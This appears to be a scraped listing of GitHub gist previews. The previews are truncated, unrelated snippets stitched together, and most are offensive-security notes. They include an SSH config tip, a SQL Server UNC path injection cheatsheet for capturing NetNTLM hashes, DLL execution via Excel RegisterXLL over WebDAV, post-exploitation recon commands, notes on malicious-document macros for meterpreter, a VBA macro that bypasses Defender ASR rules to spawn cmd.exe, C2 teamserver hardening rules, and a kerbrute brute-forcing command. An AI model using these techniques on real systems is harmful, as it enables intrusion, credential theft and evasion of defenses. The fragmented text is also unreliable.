@pjendrusik
pjendrusik / gist:6b7db53bafc340ea56a8
Created May 20, 2014 08:51
Enable SSH Connection Sharing and Persistence
# add to ~/.ssh/config (ssh_config uses '#' for comments, not '//')
ControlMaster auto
ControlPath /tmp/%r@%h:%p
ControlPersist yes
@nullbind
nullbind / SQL Server UNC Path Injection Cheatsheet
Last active December 25, 2023 22:31
SQL Server UNC Path Injection Cheatsheet
This is a list of SQL Server commands that support UNC path injections by default.
The injections can be used to capture or replay the NetNTLM password hash of the
Windows account used to run the SQL Server service. The SQL Server service account
has sysadmin privileges by default in all versions of SQL Server.
Note: This list is most likely not complete.
-----------------------------------------------------------------------
-- UNC Path Injections Executable by the Public Fixed Server Role
-----------------------------------------------------------------------
@ryhanson
ryhanson / ExcelXLL.md
Last active March 29, 2024 05:27
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local; it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.

The XLL can also be executed by double-clicking the .xll file; however, there is a security warning. @rxwx has more notes on this here inc

@infosecn1nja
infosecn1nja / Agentless-Post-Exploitation.md
Created July 22, 2017 01:07
Agentless Post-Exploitation

Agentless Post-Exploitation

Reconnaissance

echo %LOGONSERVER%
net view /DOMAIN:domain

Check Administrator Rights

@mgeeky
mgeeky / Various-Macro-Based-RCEs.md
Last active January 14, 2024 16:43
Various Visual Basic macro-based remote code execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macro construction strategies that could be used for remote code execution via a malicious document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick look before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring the user to click Enable Content
  2. The Unicorn PowerShell-based payload
@infosecn1nja
infosecn1nja / ASR Rules Bypass.vba
Last active April 25, 2024 21:00
ASR rules bypass creating child processes
' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
@infosecn1nja
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active January 7, 2024 21:51
APT Group/Red Team Weaponization Phase
APT Group/Red Team Weaponization Phase
=======================================
C2 tools:
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
Make rules that allow port 80/443 access only from the redirector (rules are appended in order, so the ACCEPT must precede the DROP):
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change the default teamserver port:
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Brute-forcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With the Rubeus version that includes the brute module:

#!/usr/bin/env python2.7
import argparse
import binascii
import sys
import base64
import hashlib
from Crypto.Cipher import AES
from pkcs7 import PKCS7Encoder
import random
from random import randint